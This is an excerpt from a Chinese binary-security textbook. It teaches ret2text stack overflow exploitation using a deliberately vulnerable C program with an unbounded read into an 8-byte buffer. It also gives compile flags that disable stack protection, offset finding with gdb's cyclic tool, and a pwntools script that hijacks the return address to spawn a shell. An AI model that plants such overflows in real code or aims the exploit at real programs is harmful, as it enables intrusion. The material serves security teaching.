二进制漏洞挖掘之ret2text栈溢出

栈溢出产生的主要原因是对一些边界未进行严格检查，攻击者可以通过覆盖函数的返回地址执行任意代码。栈溢出漏洞主要的利用方式是ROP（Return Oriented Programming，返回导向编程），通过覆盖返回地址，使程序跳转到恶意代码中，跳转的目标可以是：一段可以执行恶意命令的函数；某个全局变量空间；一个libc中的函数；一个系统调用的CPU指令序列等。

ret2text是栈溢出漏洞利用的一种方式，在程序的控制权发生跳转时，修改EIP为攻击指令的地址，且攻击指令是程序本身已有的代码（.text）。下面通过案例，实现基于ret2text方式栈溢出漏洞利用。

（1）编写C语言代码，保存文件名为“ret2text.c”，代码如下所示：

#include<stdio.h>
char sh[] = "/bin/sh";
int func()
{
    system(sh);
    return 0;
}
int dofunc()
{
    char buf[8] = {};
    puts("input:");
    read(0, buf, 0x100);
    return 0;
}
int main(int argc, char* argv[])
{
    dofunc();
    return 0;
}

由程序源码可知，dofunc函数返回时，可以利用read函数向buf写入适当数据，实现覆盖EIP，使程序跳转至func函数。为达到漏洞利用的目标，需要获取两个数据信息：buf与ebp的距离、func函数的地址。

（2）执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令，编译程序，再使用gdb调试程序，使程序运行到read函数，执行“cyclic 200”命令，生成200个字符。结果如图11-28所示。

图11-28

（3）继续执行程序，输入步骤2中生成的字符。结果如图11-29所示。

图11-29

由图可知，ebp地址存储的字符为“eaaa”，执行“cyclic -l eaaa”，结果如图11-30所示。由图可知，buf与ebp的距离为16个字节，即0x10。

图11-30

（4）使用IDA打开ret2text程序，查看func函数地址，结果如图11-31所示。由图可知，func函数地址为0x0804846B。

图11-31

（5）编写exp脚本，保存文件名为“ret2text.py”，代码如下：

from pwn import *
context(arch = "i386", os = "linux")
p = process("./ret2text")
padding2ebp = 0x10
sys_addr = 0x0804846B
payload = 'a' * (padding2ebp + 4) + p32(sys_addr)
out = "input:"
p.sendlineafter(out, payload)
p.interactive()

执行“python ret2text.py”命令，运行脚本，获取系统shell，再执行“ls”命令，测试shell能否正常使用，结果如图11-32所示。由图可知，栈溢出漏洞利用成功，获取的shell能够正常使用。

图11-32

本文节选自《二进制安全基础》，获出版社和作者授权发布。